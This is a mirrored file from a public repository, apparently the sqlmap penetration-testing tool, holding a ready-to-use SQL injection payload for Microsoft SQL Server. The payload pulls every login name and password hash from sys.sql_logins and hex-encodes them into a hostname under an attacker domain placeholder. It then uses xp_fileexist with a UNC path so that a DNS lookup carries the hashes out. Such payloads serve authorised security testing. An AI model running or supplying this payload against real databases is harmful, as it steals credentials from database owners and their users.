mirror of
https://github.com/sqlmapproject/sqlmap
synced 2025-12-15 12:52:35 +01:00
5 lines
No EOL
303 B
Text
5 lines
No EOL
303 B
Text
# Reference: http://www.defcon.org/images/defcon-17/dc-17-presentations/defcon-17-joseph_mccray-adv_sql_injection.pdf
|
|
|
|
DECLARE @host varchar(1024);
|
|
SELECT @host = name + '-' + master.sys.fn_varbintohexstr(password_hash) + '.%DOMAIN%' FROM sys.sql_logins;
|
|
EXEC('xp_fileexist "\' + @host + 'c$boot.ini"'); |